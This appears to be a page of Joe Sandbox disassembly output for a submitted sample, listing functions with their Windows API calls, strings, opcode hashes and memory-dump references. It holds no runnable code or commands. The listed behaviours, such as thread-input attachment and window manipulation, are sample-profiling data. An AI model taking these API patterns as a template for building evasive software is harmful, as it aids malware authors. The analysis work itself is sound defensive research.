Instruction Fuzzy Hash: 5D71F876A00B17ABD714EF78DC42B9AB7A8AF46724F248629F514E72C1E770DD108BD0

Function 009E2527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009E2542
GetMenuItemInfoW.USER32(00A45890,000000FF,00000000,00000030), ref: 009E25A3
SetMenuItemInfoW.USER32(00A45890,00000004,00000000,00000030), ref: 009E25D9
Sleep.KERNEL32(000001F4), ref: 009E25EB
GetMenuItemCount.USER32(?), ref: 009E262F
GetMenuItemID.USER32(?,00000000), ref: 009E264B
GetMenuItemID.USER32(?,-00000001), ref: 009E2675
GetMenuItemID.USER32(?,?), ref: 009E26BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009E2700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009E2735

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: f6945cb562df093a9fa9311a0d76637b127e5609924cea2f9bc19013aa9bcc7b
Instruction ID: 814d6382a6f9522af7dcea26a7fadd7e96344f1587164120f3b8b6635a979953
Opcode Fuzzy Hash: f6945cb562df093a9fa9311a0d76637b127e5609924cea2f9bc19013aa9bcc7b
Instruction Fuzzy Hash: 5561807490028DAFDB22CFA5CD88EAE7BBCFB45304F14056AE841A7251D772AD06DB21

Function 00A06F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A06FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A06FA8
GetWindowLongW.USER32(?,000000F0), ref: 00A06FCC
_memset.LIBCMT ref: 00A06FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A06FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A07067

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 2a0c84c3b883a55b40fa8c7137cd5e22ef8860091bb1c99330e2b0e8150f48dd
Instruction ID: 3a471f0dc772f58ebe13507f70887a4e740569f24933ae40b88580d03c0844d9
Opcode Fuzzy Hash: 2a0c84c3b883a55b40fa8c7137cd5e22ef8860091bb1c99330e2b0e8150f48dd
Instruction Fuzzy Hash: 3A617A75900208AFDB11DFA4DD81EEE77F8EB49710F104169FA14AB2E2C771AD52DBA0

Function 009D6B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 009D6BBF
SafeArrayAllocData.OLEAUT32(?), ref: 009D6C18
VariantInit.OLEAUT32(?), ref: 009D6C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 009D6C4A
VariantCopy.OLEAUT32(?,?), ref: 009D6C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 009D6CB1
VariantClear.OLEAUT32(?), ref: 009D6CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 009D6CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D6CDC
VariantClear.OLEAUT32(?), ref: 009D6CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 009D6CF9

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: e5244649c5841ca2e56916eeefe62bdae8ea963c2a9f5bbcfb2bee84c6812065
Instruction ID: 0fd6f476d1b6cc256b9aa3e059111772c897c6f49d52a7d26caa1c01140a51f0
Opcode Fuzzy Hash: e5244649c5841ca2e56916eeefe62bdae8ea963c2a9f5bbcfb2bee84c6812065
Instruction Fuzzy Hash: 94414F75A4021D9FCF10DFA8D8849AEBBB9EF48354F00C06AE955E7361CB31A946CF90

Function 009F83BB Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 00989837: __itow.LIBCMT ref: 00989862
Part of subcall function 00989837: __swprintf.LIBCMT ref: 009898AC

CoInitialize.OLE32 ref: 009F8403
CoUninitialize.OLE32 ref: 009F840E
CoCreateInstance.OLE32(?,00000000,00000017,00A12BEC,?), ref: 009F846E
IIDFromString.OLE32(?,?), ref: 009F84E1
VariantInit.OLEAUT32(?), ref: 009F857B
VariantClear.OLEAUT32(?), ref: 009F85DC

Strings

Invalid parameter, xrefs: 009F84FA
NULL Pointer assignment, xrefs: 009F84B3
Failed to create object, xrefs: 009F8479, 009F852F

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: cc17cc10dde4f8099ffabb6b68f84c1bfd0699e57dc4fe107d4d5ee72ca9b198
Instruction ID: a56b9fae0d509f31a0ab463794ddcad26215fd51f45fad313b8dc9b994671df8
Opcode Fuzzy Hash: cc17cc10dde4f8099ffabb6b68f84c1bfd0699e57dc4fe107d4d5ee72ca9b198
Instruction Fuzzy Hash: 5161CF7060831AAFC750DF64C848F6FB7E8AF85754F044859FA819B2A1CB74ED49CB92

Function 009F5732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 009F5793
inet_addr.WSOCK32(?,?,?), ref: 009F57D8
gethostbyname.WSOCK32(?), ref: 009F57E4
IcmpCreateFile.IPHLPAPI ref: 009F57F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009F5878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 009F58ED
WSACleanup.WSOCK32 ref: 009F58F3

Strings

Ping, xrefs: 009F5816

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 548ac2fe159113e3878234d85797b1b37e0a37be0ada8df81fb792bc7346c298
Instruction ID: 85c728a162b2bd46f6d3b32399fa0a2a3f633685cadf513fb80ebf6174432e9e
Opcode Fuzzy Hash: 548ac2fe159113e3878234d85797b1b37e0a37be0ada8df81fb792bc7346c298
Instruction Fuzzy Hash: AE519E31600704DFDB20EF64DC45B3A77E4AF88750F058929FA56EB2A1DB30E805CB42

Function 009EB4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009EB4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 009EB546
GetLastError.KERNEL32 ref: 009EB550
SetErrorMode.KERNEL32(00000000,READY), ref: 009EB5BD

Strings

INVALID, xrefs: 009EB58F
READONLY, xrefs: 009EB588
NOTREADY, xrefs: 009EB57C
UNKNOWN, xrefs: 009EB575
READY, xrefs: 009EB596

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: fe51085506c79832a036e035dbee313d4892e8242e69387da08f0647e6b6d0b5
Instruction ID: 1e7f4a6219ec644030dfcfe311b77fc28c74985836806ad211db7c29b4101575
Opcode Fuzzy Hash: fe51085506c79832a036e035dbee313d4892e8242e69387da08f0647e6b6d0b5
Instruction Fuzzy Hash: 40319C35A00249AFCB11EFA9C885ABEBBB8FF48310F144526F505A7291DF759E42CB81

Function 009D8F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 009D9014
GetDlgCtrlID.USER32 ref: 009D901F
GetParent.USER32 ref: 009D903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 009D903E
GetDlgCtrlID.USER32(?), ref: 009D9047
GetParent.USER32(?), ref: 009D9063
SendMessageW.USER32(00000000,?,?,00000111), ref: 009D9066

Strings

ListBox, xrefs: 009D8FD1
ComboBox, xrefs: 009D8F9C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 95426019835b6936d5e218234bf1c8c0a755ebbb8447f9fc555836e91751a551
Instruction ID: dee751ca59e211b78560518223b5884af4614340ce695b6f242cbef42f3ffdad
Opcode Fuzzy Hash: 95426019835b6936d5e218234bf1c8c0a755ebbb8447f9fc555836e91751a551
Instruction Fuzzy Hash: 5B21B274A40108BFDF14EBA0CC85EBEBB79EF85310F504216B921972A1DB76981ADB20

Function 009D907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00987DE1: _memmove.LIBCMT ref: 00987E22

Part of subcall function 009DAA99: GetClassNameW.USER32(?,?,000000FF), ref: 009DAABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 009D90FD
GetDlgCtrlID.USER32 ref: 009D9108
GetParent.USER32 ref: 009D9124
SendMessageW.USER32(00000000,?,00000111,?), ref: 009D9127
GetDlgCtrlID.USER32(?), ref: 009D9130
GetParent.USER32(?), ref: 009D914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 009D914F

Strings

ListBox, xrefs: 009D90BC
ComboBox, xrefs: 009D9087

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: 7e1e2e134ddf090d59030ba787eacac5e39c7de7b47aff3c1c4c663a73f14acf
Instruction ID: 84e50d4525712f3843ae15da6b4fd5b594b73a448de7b98c35b5400048613ff8
Opcode Fuzzy Hash: 7e1e2e134ddf090d59030ba787eacac5e39c7de7b47aff3c1c4c663a73f14acf
Instruction Fuzzy Hash: 1921B074A40108BBDF10ABA0CC85BFEBB78EB48300F504116B911A73A1DB76881ADB20

Function 009D9163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 009D916F
GetClassNameW.USER32(00000000,?,00000100), ref: 009D9184
_wcscmp.LIBCMT ref: 009D9196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 009D9211

Strings

SHELLDLL_DefView, xrefs: 009D9190
list, xrefs: 009D91F3
details, xrefs: 009D91BF
largeicons, xrefs: 009D91A5
smallicons, xrefs: 009D91D9

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: f8d2840677042fa3bc0f2c5d9fbb63e9d2424232f2778fd0ea890d3b5f168ff0
Instruction ID: 805935b55f396de7cab4f5e7af98203980ea2d6c6853375e522af6e834c4c250
Opcode Fuzzy Hash: f8d2840677042fa3bc0f2c5d9fbb63e9d2424232f2778fd0ea890d3b5f168ff0
Instruction Fuzzy Hash: C9110A762CC30BB9FA213728DC06EA7379CAB16720F204527FA14F55D1EE61A8525594

Function 009F88AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 009F88D7
CoInitialize.OLE32(00000000), ref: 009F8904
CoUninitialize.OLE32 ref: 009F890E
GetRunningObjectTable.OLE32(00000000,?), ref: 009F8A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 009F8B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00A12C0C), ref: 009F8B6F
CoGetObject.OLE32(?,00000000,00A12C0C,?), ref: 009F8B92
SetErrorMode.KERNEL32(00000000), ref: 009F8BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 009F8C25
VariantClear.OLEAUT32(?), ref: 009F8C35

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 4f5330b1ba4b47081e00dea8e41e21ba565faf3cf59e4d6b201e656cc46cd927
Instruction ID: d8687d368de9e5489b20024b7f710165e7843dfdb46e8ad2fb5de5e16373d58f
Opcode Fuzzy Hash: 4f5330b1ba4b47081e00dea8e41e21ba565faf3cf59e4d6b201e656cc46cd927
Instruction Fuzzy Hash: 67C137B1608309AFC740DF64C884A6BB7E9FF89348F00495DFA899B251DB71ED46CB52

Function 009E7990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 009E7A6C

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: fef5803adee646a8f606a83fe0f9471e759159abb15b91cebfc2e0234ddce3c9
Instruction ID: 9c98c74df9ad2de550c7d7a5b90a28fa0af0c297fd10b231cb4b26ad72c40502
Opcode Fuzzy Hash: fef5803adee646a8f606a83fe0f9471e759159abb15b91cebfc2e0234ddce3c9
Instruction Fuzzy Hash: DEB19E7190424A9FDB12DFE5C884BBEB7B8EF49320F244469EA41EB341D734AD41CB92

Function 009E11CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 009E11F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E1204
GetWindowThreadProcessId.USER32(00000000), ref: 009E120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0268,?,00000001), ref: 009E121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 009E122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0268,?,00000001), ref: 009E1245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009E0268,?,00000001), ref: 009E1257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E12B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,009E0268,?,00000001), ref: 009E12BC

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 699f320aff378938b0bd8448f94e3107bf8c18224bcbf32c34c5138cbebbc822
Instruction ID: 633c0cde0f44d79d0e9a2d33c26c3d44729546049ca9e1d9dc892846b2e20511
Opcode Fuzzy Hash: 699f320aff378938b0bd8448f94e3107bf8c18224bcbf32c34c5138cbebbc822
Instruction Fuzzy Hash: 21310179600348FFDB22DF91EC88FA937ADEB96311F104125FE10D62A0D7759D868B61

Function 0098FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 0098FAA6
OleUninitialize.OLE32(?,00000000), ref: 0098FB45
UnregisterHotKey.USER32(?), ref: 0098FC9C
DestroyWindow.USER32(?), ref: 009C45D6
FreeLibrary.KERNEL32(?), ref: 009C463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 009C4668

Strings

close all, xrefs: 0098FAA1

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 2580f2f01c4558e6bdcc5d19da7b2447e2543e4dad57cc9cdd8d571ae8f0df46
Instruction ID: 3185dcd23638fb37f3bd41a335032de653186798e5e986f48b7a4ac879e008d2
Opcode Fuzzy Hash: 2580f2f01c4558e6bdcc5d19da7b2447e2543e4dad57cc9cdd8d571ae8f0df46
Instruction Fuzzy Hash: 54A15834B01212CFCB29EF14C9A5F69F368AF45710F5546ADE80AAB261DB30AD16CF91

Function 009DA068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,009DA439), ref: 009DA377

Strings

REGEXPCLASS, xrefs: 009DA13C
CLASS, xrefs: 009DA0F6
INSTANCE, xrefs: 009DA285
NAME, xrefs: 009DA1A9
TEXT, xrefs: 009DA2AE
CLASSNN, xrefs: 009DA119

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: a8d7cead0b86b75dbd34b252c008ca8c377273ab8861e7bc2b3628441c537241
Instruction ID: 00b0ddf5241b00a9cc31bc921c6a157511d6e8cfe32b4488e9c17196a502af7d
Opcode Fuzzy Hash: a8d7cead0b86b75dbd34b252c008ca8c377273ab8861e7bc2b3628441c537241
Instruction Fuzzy Hash: E891E830A44605ABCB08EFA0C441BEDFB79BF85304F54C51AE959A7341DF31AAA9CBD1

Function 00982E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00982EAE

Part of subcall function 00981DB3: GetClientRect.USER32(?,?), ref: 00981DDC
Part of subcall function 00981DB3: GetWindowRect.USER32(?,?), ref: 00981E1D
Part of subcall function 00981DB3: ScreenToClient.USER32(?,?), ref: 00981E45

GetDC.USER32 ref: 009BCD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 009BCD45
SelectObject.GDI32(00000000,00000000), ref: 009BCD53
SelectObject.GDI32(00000000,00000000), ref: 009BCD68
ReleaseDC.USER32(?,00000000), ref: 009BCD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 009BCDFB

Strings

U, xrefs: 009BCCD0

Memory Dump Source

Source File: 00000000.00000002.1288180347.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1288161147.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A0F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288241799.0000000000A34000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288295759.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1288316611.0000000000A47000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_6SN0DJ38zZ.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 2d018c629de8ffc698af5335b32549da0b2464951a44c8804b85591012d95f4a
Instruction ID: 9c482138d07e62e267663d89819ef601411b5b5331172c682441e81b1167ba39
Opcode Fuzzy Hash: 2d018c629de8ffc698af5335b32549da0b2464951a44c8804b85591012d95f4a
Instruction Fuzzy Hash: 2971E375500209DFCF21DF64C984AEA7FB9FF89320F14467AED555A2A6C7318C82DB60

